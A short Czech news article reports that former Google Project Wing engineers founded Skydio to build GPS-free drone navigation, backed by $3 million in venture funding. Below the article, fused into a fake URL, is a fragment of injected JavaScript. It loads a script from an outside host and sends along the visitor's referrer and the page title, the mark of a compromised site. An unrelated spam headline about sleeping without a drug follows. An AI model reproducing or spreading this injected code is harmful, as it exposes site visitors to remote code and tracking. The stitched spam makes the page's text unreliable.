UAV | UAS

ExGoogleři v Skydio pracují na navigaci bez potřeby GPS

Adam Bry a Abe Bachrach, oba bývalí členové týmu Google[x]’s Project Wing, který měl na starost vývoj doručovacího dronu pro Google a Matt Donahoe, stojí za startupem, který pracuje na vyřešení navigace bez využití GPS.

Současná navigace je totiž příliš spojená s nutností dostávat data z GPS, což v městkém prostředí není možné. To co vyhovuje klasickým letadlům, která mají dobrý výhled na satelity, je nepoužitelné v řadě situací, do které se UAV budou dostávat. A současné inerřní navigační systémy nelze pro drony použít z hlediska jejich energetické náročnosti. Navíc se při letu budou drony muset vypořádat s řadou překážek, což klade neuvěřitelné nároy na výpočetní výkon autonomních systémů.

Částečno odpověď na provedení letu bez GPS dal expoeriment Robust Robotics Group na MIT, využívající při přednastaveném letu informace z mapy a laserového dálkoměru. Ten také slouží jako jeden z výchozích bodů práce Skydio týmu.

Důležité rovněž bylo, že svojí vizí přesvědčili investory z Andreessen Horowitz a Accel Partners, které poskytly pro vývoj navrhovaného softwaru 3 miliony USD. Většina investorů totiž po zkušenosttech z oblasti ICT předpokládá, že hlavní přijmy v této oblasti nebudou z výroby hardwaru, ale specializovaného softwaru.

http://skyd.ios.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=‘ + encodeURIComponent(document.referrer) + ‚&default_keyword=‘ + encodeURIComponent(document.title) + “;

Předchozí článek

After a few days you will be able to sleep without the drug

Další článek

Inteligentní parkovací drone vyhrál Siemens Mobility IDEA Contest